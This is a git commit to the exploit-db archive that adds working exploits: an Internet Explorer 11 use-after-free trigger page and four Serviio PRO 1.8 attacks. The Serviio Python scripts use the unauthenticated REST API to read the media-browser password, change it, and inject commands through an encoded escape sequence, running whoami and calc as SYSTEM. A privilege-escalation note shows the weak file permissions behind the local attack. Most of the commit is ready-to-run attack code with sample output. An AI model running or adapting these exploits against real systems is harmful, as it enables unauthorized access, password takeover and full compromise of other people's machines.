DB: 2017-05-04

5 new exploits

Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free

Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation
Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure
Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change
Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution
This commit is contained in:
Offensive Security 2017-05-04 05:01:18 +00:00
parent 6515e26356
commit b473ba51f3
6 changed files with 590 additions and 0 deletions

View file

@ -5482,6 +5482,7 @@ id,file,description,date,author,platform,type,port
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
41957,platforms/windows/dos/41957.html,"Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8967,6 +8968,7 @@ id,file,description,date,author,platform,type,port
41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37805,3 +37807,6 @@ id,file,description,date,author,platform,type,port
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
41958,platforms/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps,0
41960,platforms/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps,0
41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0

Can't render this file because it is too large.

141
platforms/java/webapps/41958.py Executable file
View file

@ -0,0 +1,141 @@
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Vendor:
# "Security:
# MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
# so that you can be sure your content is only accessed by you. Make sure you keep your password
# secure."
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an information disclosure vulnerability due to improper access control enforcement
# of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
# via a specially crafted request, to gain access to potentially sensitive information.
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5404
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen
if (len(sys.argv) <= 2):
print '[*] Usage: serviio_id.py <ip address> <port>'
print '[*] Example: serviio_id.py 10.211.55.3 23423'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
print '\nPrinting ServiioLinks:'
print '----------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('serviioLink'):
print URLs.text
print
headers = {'Accept': 'application/xml'}
#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
print '\nPrinting directories:'
print '---------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('path'):
print URLs.text
print
headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
print '\nPrinting mediabrowser password:'
print '-------------------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('remoteUserPassword'):
print URLs.text
print
'''
rewt@zslab:~# python serviio_id.py 10.211.55.3 23423
Printing ServiioLinks:
----------------------
serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource
Printing directories:
---------------------
/etc/apache2
/etc/asl
/etc/cups
/etc/defaults
/etc/emond.d
/etc/mach_init.d
/etc/mach_init_per_login_session.d
/etc/mach_init_per_user.d
/etc/manpaths.d
/etc/newsyslog.d
/etc/openldap
/etc/pam.d
/etc/paths.d
/etc/periodic
/etc/pf.anchors
/etc/postfix
/etc/ppp
/etc/racoon
/etc/security
/etc/snmp
/etc/ssh
/etc/ssl
/etc/sudoers.d
Printing mediabrowser password:
-------------------------------
s3cr3to
rewt@zslab:~#
'''

77
platforms/java/webapps/41960.py Executable file
View file

@ -0,0 +1,77 @@
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an unauthenticated password modification vulnerability due to improper access
# control enforcement of the Configuration REST API. A remote attacker can exploit this,
# via a specially crafted request, to change the login password for the mediabrowser protected
# page.
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5407
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen
if (len(sys.argv) <= 3):
print '[*] Usage: serviio_pwd.py <ipaddress> <port> <newpassword>'
print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2'
exit(0)
host = sys.argv[1]
port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424.
lozi = sys.argv[3]
values = """
<remoteAccess>
<remoteUserPassword>{0}</remoteUserPassword>
<preferredRemoteDeliveryQuality>ORIGINAL</preferredRemoteDeliveryQuality>
<portMappingEnabled>true</portMappingEnabled>
<externalAddress>myserviio.dyndns.com</externalAddress>
</remoteAccess>"""
put = values.format(lozi)
headers = {
'Content-Type': 'application/xml',
'Accept': 'application/xml'
}
request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers)
request.get_method = lambda: 'PUT'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for errorcode in roottree.iter('errorCode'):
print "\nReceived error code: "+errorcode.text
print 'Password successfully changed to: '+lozi
print 'Go to: http://'+host+':23424/mediabrowser\n'

145
platforms/windows/dos/41957.html Executable file
View file

@ -0,0 +1,145 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:black;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/********************************
* Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
* Google Dork: n/a
* Date: 03.05.2017
* Exploit Author: Marcin Ressel
* TT: @r_esselm
* Vendor Homepage: www.microsoft.com
* Software Link: n/a
* Version: 11.0.9600.18638
* Tested on: Windows 7
* CVE : n/a
* ****************************
(151c.10a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
706af750 ff36 push dword ptr [esi] ds:002b:1195cfa0=????????
0:007> !heap -p -a @esi
address 1195cfa0 found in
_DPH_HEAP_ROOT @ 9f61000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
ef4230c: 1195c000 2000
743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
76f4a863 ntdll!RtlpFreeHeap+0x0000005d
76ef2bd5 ntdll!RtlFreeHeap+0x00000142
769c14ad kernel32!HeapFree+0x00000014
707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
700c5484 MSHTML!CFrameSite::Passivate+0x00000024
6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
705517cb MSHTML!CBase::JSBind_Release+0x00000050
6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
*
*/
var ref = [];
var doc = null;
var dom = null;
var trg = null;
var trg_parent = null;
var text_r = null;
var select_o = null;
function handle() {
try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
try{text_r.select();}catch(e){}
try{tree_r.setEnd(ref[0],0);}catch(e){}
try{select_o.selectAllChildren(doc.body);}catch(e){}
try{tree_r.surroundContents(ref[0]);}catch(e){}
try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
try{tree_r.selectNodeContents(document.body);}catch(e){}
try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
}
function testcase() {
var e1f = document.getElementById("e1");
doc = document.getElementById("t1").contentWindow.document;
e = e1f.contentWindow.document.createElement("ins");
e.cite = 'about:blank';
rf = doc.body.appendChild(e);
ref.push(rf);
e = e1f.contentWindow.document.createElement("iframe");
rf = doc.body.appendChild(e);
ref.push(rf);
dom = doc.getElementsByTagName("*");
trg = dom[3];
trg_parent = doc.body;
text_r = doc.body.createTextRange();
tree_r = doc.createRange();
tree_r.setStart(trg,0);
tree_r.setEnd(trg,0);
select_o = window.getSelection();
var ob = new MutationObserver(handle);
ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true });
try {
trg.insertBefore(document.createElement("div"),ref[1]);
} catch(e) {}
doc.adoptNode(trg.attributes[0]);
trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "&Agrave;";
tmp = trg;
}
</script>
<title>IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
</head>
<body onload='testcase();'>
<iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
</body>
</html>

View file

@ -0,0 +1,66 @@
Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation
Vendor: Petr Nejedly | Six Lines Ltd
Product web page: http://www.serviio.org
Affected version: 1.8.0.0 PRO
Summary: Serviio is a free media server. It allows you to stream your media
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
games console or mobile phone) on your connected home network.
Desc: The application suffers from an unquoted search path issue impacting the service
'Serviio' for Windows deployed as part of Serviio DLNA server solution. This could potentially
allow an authorized but non-privileged local user to execute arbitrary code with elevated
privileges on the system. A successful attempt would require the local user to be able to
insert their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot. If successful, the
local users code would execute with the elevated privileges of the application.
Serviio also suffers from improper permissions which can be used by a simple authenticated user
that can change the executable file with a binary of choice. The vulnerability exist due to the
improper permissions, with the 'F' flag (Full) for 'Users' group, for the Serviio directory and
its sub-directories.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5405
Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
12.12.2016
---
C:\>sc qc Serviio
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Serviio
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Serviio\bin\ServiioService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Serviio
DEPENDENCIES : HTTP
SERVICE_START_NAME : LocalSystem
C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>

View file

@ -0,0 +1,156 @@
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Desc: The version of Serviio installed on the remote Windows host is affected by
# an unauthenticated remote code execution vulnerability due to improper access control
# enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper
# calls cmd.exe to execute system commands. A remote attacker can exploit this with a
# simple JSON request, gaining system access with SYSTEM privileges via a specially
# crafted request and escape sequence.
#
# =================================================================================
# org/serviio/ui/resources/server/ActionsServerResource.java:
# -----------------------------------------------------------
#
# private ResultRepresentation checkStreamUrl(ActionRepresentation representation) {
# this.validateParameters(representation, 2);
# try {
# MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0));
# String url = StringUtils.trim(representation.getParameters().get(1));
# LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType);
# DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null);
# FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context);
# return this.responseOk();
# }
# catch (InvalidMediaFormatException e) {
# return this.responseOk(603);
# }
#
# =================================================================================
# serviio.jar / external / ProcessExecutor.java:
# ----------------------------------------------
#
# private Map<String, String> createWindowsRuntimeEnvironmentVariables() {
# HashMap<String, String> newEnv = new HashMap<String, String>();
# newEnv.putAll(System.getenv());
# ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2];
# i18n[0] = new ProcessExecutorParameter("cmd");
# i18n[1] = new ProcessExecutorParameter("/C");
# for (int counter = 0; counter < this.commandArguments.length; ++counter) {
# ProcessExecutorParameter argument = this.commandArguments[counter];
# String envName = "JENV_" + counter;
# i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%");
# boolean quotesNeededForWindows = this.quotesNeededForWindows(argument);
# if (!quotesNeededForWindows) {
# argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue()));
# }
# newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows));
# }
# this.commandArguments = i18n;
# String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir"));
# newEnv.put("HOMEDRIVE", tempPath[0]);
# newEnv.put("HOMEPATH", tempPath[1]);
# newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables());
# if (log.isTraceEnabled()) {
# log.trace(String.format("Env variables: %s", newEnv.toString()));
# }
# return newEnv;
# }
#
# private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) {
# return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? "\"" : "");
# }
#
# protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) {
# boolean quotesNeeded = argument.getValue().indexOf(" ") > -1;
# return quotesNeeded;
# }
#
# private String escapeAmpersandForWindows(String value) {
# return value.replaceAll("&", "^&");
# }
#
# =================================================================================
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Java/1.8.0_121
# Java/1.8.0_111
# Java/1.8.0_91
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5408
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
#
# The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami
# output in it and start a calc.exe child process as nt authority\system.
#
from urllib2 import Request, urlopen
import sys
if (len(sys.argv) <= 1):
print '[*] Usage: serviio_rce.py <ip address>'
exit(0)
host = sys.argv[1]
values = """
<action>
<name>checkStreamUrl</name>
<parameter>VIDEO</parameter>
<parameter>1.2.3.4&#x27;&#x5c;"&#x60;&&#x77;&#x68;&#x6f;&#x61;&#x6d;&#x69;&#x20;>&#x74;&#x65;&#x73;&#x74;&#x69;&#x6e;&#x67;&#x75;&#x73;&#x33;&#x2e;&#x74;&#x78;&#x74;&&&#x63;&#x61;&#x6c;&#x63;&&#x60;&#x27;</parameter>
</action>"""
headers = {
'Content-Type': 'application/xml',
'Accept': 'application/xml'
}
request = Request('http://'+host+':23423/rest/action', data=values, headers=headers)
response_body = urlopen(request).read()
print response_body
'''
Raw request:
POST /rest/action HTTP/1.1
Host: 10.211.55.3:23423
Content-Length: 93
Accept: application/json, text/plain, */*
Origin: http://10.211.55.3:23423
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: http://10.211.55.3:23423/console/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
DNT: 1
Connection: close
{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]}
'''